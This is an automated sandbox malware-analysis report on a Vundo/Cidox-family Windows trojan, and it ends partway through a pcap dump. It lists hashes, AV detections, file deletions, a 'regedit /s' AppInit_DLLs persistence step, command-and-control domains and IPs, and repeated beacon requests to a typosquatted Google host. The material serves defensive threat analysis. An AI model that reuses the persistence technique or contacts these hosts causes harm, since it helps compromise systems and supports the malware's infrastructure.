Analysis Date | 2014-11-13 15:37:36 |
---|---|
MD5 | 8dc8a182ba353a7a6fc1a32eeab4a8a7 |
SHA1 | 8b0f40cfebc665fc5e984beb22fbf06a013ef7f2 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: e10d299aee81c43ede6107cfd694d791 sha1: 909378f88f1bea29f23636abfaaed914d07407ed size: 157696 | |
Section | .rdata md5: 452932fb0f06ef597e216a44a5a4add4 sha1: fa8bd755ad0b66dde6fdd0798d3a1066b832aa0d size: 7680 | |
Section | .data md5: d5ca73063f2caf403729291c844e9b5e sha1: df79fd8183ccbecf49fb3180517e27eae6840db0 size: 3584 | |
Section | .rsrc md5: c96411e822dfe10e0259a74d0993b494 sha1: 9710ea17765291062c919b03c379ee0952609606 size: 20480 | |
Timestamp | 2012-10-12 22:17:17 | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | d90c42a2eaefe18856e200358c6cd6afd03c4bc1 | |
IMPhash | 69b9295363fc8d11cadadd4e040942b4 | |
AV | 360 Safe | Gen:Variant.Symmi.5161 |
AV | Ad-Aware | Gen:Variant.Symmi.5161 |
AV | Alwil (avast) | Vundo-XR [Trj] |
AV | Arcabit (arcavir) | no_virus |
AV | Authentium | W32/Cidox.A.gen!Eldorado |
AV | Avira (antivir) | TR/Vundo.Gen8 |
AV | BullGuard | Gen:Variant.Symmi.5161 |
AV | CA (E-Trust Ino) | Win32/Vundo.N!generic |
AV | CAT (quickheal) | no_virus |
AV | ClamAV | no_virus |
AV | Dr. Web | Trojan.Mayachok.17986 |
AV | Emsisoft | Gen:Variant.Symmi.5161 |
AV | Eset (nod32) | Win32/Kryptik.ANDO |
AV | Fortinet | W32/Cidox.AND!tr |
AV | Frisk (f-prot) | W32/Cidox.A.gen!Eldorado |
AV | F-Secure | Gen:Variant.Symmi.5161 |
AV | Grisoft (avg) | BackDoor.Generic15.CNOC |
AV | Ikarus | Trojan-Downloader.Win32.Vundo |
AV | K7 | no_virus |
AV | Kaspersky | Trojan.Win32.Generic |
AV | MalwareBytes | Trojan.Agent |
AV | Mcafee | no_virus |
AV | Microsoft Security Essentials | TrojanDropper:Win32/Vundo.V |
AV | MicroWorld (escan) | Gen:Variant.Symmi.5161 |
AV | Norman | Gen:Variant.Symmi.5161 |
AV | Rising | no_virus |
AV | Sophos | Troj/Vundo-AK |
AV | Symantec | no_virus |
AV | Trend Micro | TROJ_SPNR.30L412 |
AV | VirusBlokAda (vba32) | no_virus |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
---|---|
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Process
↳ C:\WINDOWS\Explorer.EXE
Registry | HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL |
---|---|
Creates File | \Device\Afd\Endpoint |
Creates File | C:\WINDOWS\system32\sqgyarh.dll |
Creates File | C:\Documents and Settings\Administrator\Cookies\cf |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Creates Process | C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Winsock DNS | clickbeta.ru |
Winsock DNS | 91.220.35.154 |
Winsock DNS | veroconma.com |
Winsock DNS | terrans.su |
Winsock DNS | getinball.com |
Winsock DNS | theloamva.com |
Winsock DNS | tryatdns.com |
Winsock DNS | clickclans.ru |
Winsock DNS | dentagod.com |
Winsock DNS | denareclick.com |
Winsock DNS | debijonda.com |
Winsock DNS | fescheck.com |
Winsock DNS | liteworns.com |
Winsock DNS | getintsu.com |
Winsock DNS | nshouse1.com |
Winsock DNS | vengibit.com |
Winsock DNS | tryangets.com |
Winsock DNS | netrovad.com |
Winsock DNS | vornedix.com |
Winsock DNS | inzavora.com |
Winsock DNS | getavodes.com |
Winsock DNS | clickstano.com |
Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\sqgyarh.dll\\x00 |
---|
Network Details:
DNS | debijonda.com Type: A 141.8.225.80 |
---|---|
DNS | veroconma.com Type: A 74.117.179.241 |
DNS | theloamva.com Type: A 141.8.225.80 |
DNS | vornedix.com Type: A 141.8.225.80 |
DNS | dentagod.com Type: A 141.8.225.80 |
DNS | liteworns.com Type: A 141.8.225.80 |
DNS | vengibit.com Type: A 141.8.225.80 |
DNS | tryangets.com Type: A 141.8.225.80 |
DNS | getintsu.com Type: A 141.8.225.80 |
DNS | getavodes.com Type: A 141.8.225.80 |
DNS | tryatdns.com Type: A 209.222.14.3 |
DNS | fescheck.com Type: A 209.222.14.3 |
DNS | inzavora.com Type: A 141.8.225.80 |
DNS | getinball.com Type: A |
DNS | netrovad.com Type: A |
DNS | terrans.su Type: A |
DNS | clickstano.com Type: A |
DNS | denareclick.com Type: A |
DNS | clickbeta.ru Type: A |
DNS | nshouse1.com Type: A |
DNS | clickclans.ru Type: A |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc4+XrHWaR8LY User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc/kCGdp9ZUYD User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc/kCGdp9ZUYD User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc2t5PIYtxQ5I User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc2t5PIYtxQ5I User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc0h/HPjHB2Lt User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc9uz2Kqt+ksf User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc9uz2Kqt+ksf User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc9uz2Kqt+ksf User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc4sB3kaad+Ty User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45GcwuHiebXOh2A User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45GcyqXAfbKaZgr User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc9uz2Kqt+ksf User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc1/idPwODnqc User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1032 ➝ 74.117.179.241:80 |
Flows TCP | 192.168.1.1:1033 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1034 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1035 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1036 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1037 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1038 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1039 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1040 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1041 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1042 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1043 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1044 ➝ 91.220.35.154:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31343526 XX0000&key=1145& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d393626 6f733d35 2e312e32 3630302e =96&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f77 35444a6b 6c2b7666 6232334b yg/w5DJkl+vfb23K 0x000000b0 (00176) 412b472f 36764234 372b7158 7a4f3435 A+G/6vB47+qXzO45 0x000000c0 (00192) 4763342b 58724857 6152384c 59204854 Gc4+XrHWaR8LY HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31343526 XX0000&key=1145& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d393626 6f733d35 2e312e32 3630302e =96&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f77 35444a6b 6c2b7666 6232334b yg/w5DJkl+vfb23K 0x000000b0 (00176) 412b472f 36764234 372b7158 7a4f3435 A+G/6vB47+qXzO45 0x000000c0 (00192) 47632f6b 43476470 395a5559 44204854 Gc/kCGdp9ZUYD HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31343526 XX0000&key=1145& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d393626 6f733d35 2e312e32 3630302e =96&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f77 35444a6b 6c2b7666 6232334b yg/w5DJkl+vfb23K 0x000000b0 (00176) 412b472f 36764234 372b7158 7a4f3435 A+G/6vB47+qXzO45 0x000000c0 (00192) 47632f6b 43476470 395a5559 44204854 Gc/kCGdp9ZUYD HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31343526 XX0000&key=1145& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d393626 6f733d35 2e312e32 3630302e =96&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f77 35444a6b 6c2b7666 6232334b yg/w5DJkl+vfb23K 0x000000b0 (00176) 412b472f 36764234 372b7158 7a4f3435 A+G/6vB47+qXzO45 0x000000c0 (00192) 47633274 35504959 74785135 49204854 Gc2t5PIYtxQ5I HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31343526 XX0000&key=1145& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d393626 6f733d35 2e312e32 3630302e =96&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f77 35444a6b 6c2b7666 6232334b yg/w5DJkl+vfb23K 0x000000b0 (00176) 412b472f 36764234 372b7158 7a4f3435 A+G/6vB47+qXzO45 0x000000c0 (00192) 47633274 35504959 74785135 49204854 Gc2t5PIYtxQ5I HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31343526 XX0000&key=1145& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d393626 6f733d35 2e312e32 3630302e =96&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f77 35444a6b 6c2b7666 6232334b yg/w5DJkl+vfb23K 0x000000b0 (00176) 412b472f 36764234 372b7158 7a4f3435 A+G/6vB47+qXzO45 0x000000c0 (00192) 47633068 2f48506a 4842324c 74204854 Gc0h/HPjHB2Lt HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31343526 XX0000&key=1145& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d393626 6f733d35 2e312e32 3630302e =96&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f77 35444a6b 6c2b7666 6232334b yg/w5DJkl+vfb23K 0x000000b0 (00176) 412b472f 36764234 372b7158 7a4f3435 A+G/6vB47+qXzO45 0x000000c0 (00192) 47633975 7a324b71 742b6b73 66204854 Gc9uz2Kqt+ksf HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31343526 XX0000&key=1145& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d393626 6f733d35 2e312e32 3630302e =96&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f77 35444a6b 6c2b7666 6232334b yg/w5DJkl+vfb23K 0x000000b0 (00176) 412b472f 36764234 372b7158 7a4f3435 A+G/6vB47+qXzO45 0x000000c0 (00192) 47633975 7a324b71 742b6b73 66204854 Gc9uz2Kqt+ksf HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31343526 XX0000&key=1145& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d393626 6f733d35 2e312e32 3630302e =96&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f77 35444a6b 6c2b7666 6232334b yg/w5DJkl+vfb23K 0x000000b0 (00176) 412b472f 36764234 372b7158 7a4f3435 A+G/6vB47+qXzO45 0x000000c0 (00192) 47633975 7a324b71 742b6b73 66204854 Gc9uz2Kqt+ksf HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31343526 XX0000&key=1145& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d393626 6f733d35 2e312e32 3630302e =96&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f77 35444a6b 6c2b7666 6232334b yg/w5DJkl+vfb23K 0x000000b0 (00176) 412b472f 36764234 372b7158 7a4f3435 A+G/6vB47+qXzO45 0x000000c0 (00192) 47633473 42336b61 61642b54 79204854 Gc4sB3kaad+Ty HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31343526 XX0000&key=1145& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d393626 6f733d35 2e312e32 3630302e =96&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f77 35444a6b 6c2b7666 6232334b yg/w5DJkl+vfb23K 0x000000b0 (00176) 412b472f 36764234 372b7158 7a4f3435 A+G/6vB47+qXzO45 0x000000c0 (00192) 47637775 48696562 584f6832 41204854 GcwuHiebXOh2A HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31343526 XX0000&key=1145& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d393626 6f733d35 2e312e32 3630302e =96&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f77 35444a6b 6c2b7666 6232334b yg/w5DJkl+vfb23K 0x000000b0 (00176) 412b472f 36764234 372b7158 7a4f3435 A+G/6vB47+qXzO45 0x000000c0 (00192) 47637971 58416662 4b615a67 72204854 GcyqXAfbKaZgr HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31343526 XX0000&key=1145& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 